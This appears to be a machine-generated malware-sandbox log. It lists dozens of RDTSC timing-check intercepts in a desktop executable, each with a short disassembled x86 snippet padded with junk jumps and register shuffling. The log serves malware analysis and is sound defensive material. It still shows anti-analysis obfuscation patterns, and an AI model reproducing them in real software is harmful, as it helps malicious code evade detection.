                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A600D9 second address: 4A60112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov bh, 31h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB3E0C7B6A6h 0x00000014 sub ax, FDE8h 0x00000019 jmp 00007FB3E0C7B69Bh 0x0000001e popfd 0x0000001f mov ah, B1h 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60112 second address: 4A60127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E91h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60127 second address: 4A60154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB3E0C7B69Dh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FB3E0C7B69Eh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov eax, edi 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00E8 second address: 49F0169 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB3E1482E98h 0x00000008 add ch, 00000028h 0x0000000b jmp 00007FB3E1482E8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FB3E1482E98h 0x00000019 adc si, DF88h 0x0000001e jmp 00007FB3E1482E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007FB3E1482E99h 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB3E1482E8Dh 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0169 second address: 49F01E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FB3E0C7B6A4h 0x0000000f push dword ptr [ebp+04h] 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 pushfd 0x00000017 jmp 00007FB3E0C7B6A3h 0x0000001c and cx, C73Eh 0x00000021 jmp 00007FB3E0C7B6A9h 0x00000026 popfd 0x00000027 popad 0x00000028 push dword ptr [ebp+0Ch] 0x0000002b jmp 00007FB3E0C7B69Eh 0x00000030 push dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov edi, 422D6250h 0x0000003b mov di, 537Ch 0x0000003f popad 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01E3 second address: 49F01F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E91h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C61 second address: 4A10C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C67 second address: 4A10C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C6D second address: 4A10C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C71 second address: 4A10C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C75 second address: 4A10D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FB3E0C7B6A4h 0x0000000f call 00007FB3E0C7B6A2h 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pushfd 0x00000017 jmp 00007FB3E0C7B6A0h 0x0000001c sbb si, F4E8h 0x00000021 jmp 00007FB3E0C7B69Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FB3E0C7B6A9h 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FB3E0C7B69Eh 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB3E0C7B6A7h 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D0E second address: 4A10D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D32 second address: 4A10D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1073F second address: 4A10745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10745 second address: 4A1077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB3E0C7B69Bh 0x00000012 and esi, 7BF8E80Eh 0x00000018 jmp 00007FB3E0C7B6A9h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1077E second address: 4A107D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushfd 0x00000007 jmp 00007FB3E1482E8Fh 0x0000000c or eax, 554C261Eh 0x00000012 jmp 00007FB3E1482E99h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FB3E1482E8Eh 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB3E1482E8Ah 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107D6 second address: 4A107E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E5 second address: 4A107EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107EB second address: 4A107EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107EF second address: 4A1082A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB3E1482E92h 0x00000014 or ecx, 06B6A0D8h 0x0000001a jmp 00007FB3E1482E8Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1068F second address: 4A106BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB3E0C7B69Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106BB second address: 4A106C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106C1 second address: 4A106C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106C7 second address: 4A106EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3E1482E99h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106EB second address: 4A106F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20201 second address: 4A20214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E8Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6000A second address: 4A60027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60027 second address: 4A60044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60044 second address: 4A60072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB3E0C7B6A1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303DE second address: 4A303EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E8Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303EE second address: 4A30433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FB3E0C7B6A6h 0x00000012 mov eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB3E0C7B6A7h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30433 second address: 4A3047E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c jmp 00007FB3E1482E8Eh 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB3E1482E97h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3047E second address: 4A30483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30483 second address: 4A304CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB3E1482E95h 0x0000000a or ecx, 7BC06ED6h 0x00000010 jmp 00007FB3E1482E91h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a pushad 0x0000001b call 00007FB3E1482E93h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10550 second address: 4A10554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10554 second address: 4A1056F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1056F second address: 4A1058F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 call 00007FB3E0C7B6A0h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1058F second address: 4A10593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10593 second address: 4A10597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10597 second address: 4A1059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1059D second address: 4A105F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB3E0C7B6A0h 0x0000000b or cx, 4A08h 0x00000010 jmp 00007FB3E0C7B69Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007FB3E0C7B69Bh 0x00000022 pop esi 0x00000023 call 00007FB3E0C7B6A9h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A105F2 second address: 4A10609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, ax 0x00000012 mov ax, 9599h 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10609 second address: 4A1060F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20ED2 second address: 4A20F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3E1482E8Dh 0x00000009 sbb ax, 2AC6h 0x0000000e jmp 00007FB3E1482E91h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebp 0x00000018 jmp 00007FB3E1482E8Ah 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007FB3E1482E90h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FB3E1482E8Dh 0x00000030 add si, 0D86h 0x00000035 jmp 00007FB3E1482E91h 0x0000003a popfd 0x0000003b jmp 00007FB3E1482E90h 0x00000040 popad 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3023D second address: 4A30243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30243 second address: 4A30247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30247 second address: 4A3024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50771 second address: 4A50775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50775 second address: 4A5077B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5077B second address: 4A5080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, B6EFh 0x00000007 pushfd 0x00000008 jmp 00007FB3E1482E94h 0x0000000d sub cx, 1918h 0x00000012 jmp 00007FB3E1482E8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FB3E1482E96h 0x00000021 mov ebp, esp 0x00000023 jmp 00007FB3E1482E90h 0x00000028 xchg eax, ecx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FB3E1482E8Eh 0x00000030 xor si, 9DD8h 0x00000035 jmp 00007FB3E1482E8Bh 0x0000003a popfd 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop edi 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB3E1482E8Eh 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5080C second address: 4A5081E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E0C7B69Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5081E second address: 4A50822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50822 second address: 4A508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB3E0C7B69Dh 0x00000010 xor ecx, 1E6776D6h 0x00000016 jmp 00007FB3E0C7B6A1h 0x0000001b popfd 0x0000001c mov ax, EA47h 0x00000020 popad 0x00000021 mov eax, dword ptr [76FA65FCh] 0x00000026 jmp 00007FB3E0C7B69Ah 0x0000002b test eax, eax 0x0000002d jmp 00007FB3E0C7B6A0h 0x00000032 je 00007FB45314E784h 0x00000038 pushad 0x00000039 mov esi, 3057747Dh 0x0000003e pushfd 0x0000003f jmp 00007FB3E0C7B69Ah 0x00000044 jmp 00007FB3E0C7B6A5h 0x00000049 popfd 0x0000004a popad 0x0000004b mov ecx, eax 0x0000004d pushad 0x0000004e call 00007FB3E0C7B69Ch 0x00000053 pop edi 0x00000054 push ecx 0x00000055 mov ch, dl 0x00000057 pop esi 0x00000058 popad 0x00000059 xor eax, dword ptr [ebp+08h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508C4 second address: 4A508C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508C8 second address: 4A508CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508CE second address: 4A50957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d jmp 00007FB3E1482E8Eh 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 ror eax, cl 0x00000018 jmp 00007FB3E1482E8Dh 0x0000001d leave 0x0000001e pushad 0x0000001f mov si, 1F43h 0x00000023 pushfd 0x00000024 jmp 00007FB3E1482E98h 0x00000029 adc cx, 8008h 0x0000002e jmp 00007FB3E1482E8Bh 0x00000033 popfd 0x00000034 popad 0x00000035 retn 0004h 0x00000038 nop 0x00000039 mov esi, eax 0x0000003b lea eax, dword ptr [ebp-08h] 0x0000003e xor esi, dword ptr [000B2014h] 0x00000044 push eax 0x00000045 push eax 0x00000046 push eax 0x00000047 lea eax, dword ptr [ebp-10h] 0x0000004a push eax 0x0000004b call 00007FB3E5E63707h 0x00000050 push FFFFFFFEh 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FB3E1482E90h 0x0000005b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50957 second address: 4A5095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5095B second address: 4A50961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50961 second address: 4A50982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3E0C7B69Ch 0x00000009 or ch, FFFFFF98h 0x0000000c jmp 00007FB3E0C7B69Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50982 second address: 4A509F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB3E1482E92h 0x0000000f jmp 00007FB3E1482E95h 0x00000014 popfd 0x00000015 jmp 00007FB3E1482E90h 0x0000001a popad 0x0000001b ret 0x0000001c nop 0x0000001d push eax 0x0000001e call 00007FB3E5E63785h 0x00000023 mov edi, edi 0x00000025 jmp 00007FB3E1482E90h 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FB3E1482E97h 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A509F2 second address: 4A50A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E0C7B6A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50A0A second address: 4A50A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB3E1482E93h 0x00000010 sbb ecx, 3AFF9BDEh 0x00000016 jmp 00007FB3E1482E99h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB3E1482E8Dh 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00018 second address: 4A0003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB3E0C7B6A9h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0003A second address: 4A000AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3E1482E97h 0x00000009 adc cl, 0000007Eh 0x0000000c jmp 00007FB3E1482E99h 0x00000011 popfd 0x00000012 mov di, cx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c jmp 00007FB3E1482E98h 0x00000021 jmp 00007FB3E1482E92h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000AF second address: 4A000B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000B3 second address: 4A000D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000D0 second address: 4A00104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FB3E0C7B69Eh 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edi, 68C3C6B0h 0x0000001a mov di, 9DDCh 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00104 second address: 4A00113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00113 second address: 4A00132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB3E0C7B69Ah 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00132 second address: 4A00141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00141 second address: 4A0017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB3E0C7B69Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB3E0C7B69Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0017E second address: 4A001A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E1482E95h 0x00000011 rdtsc
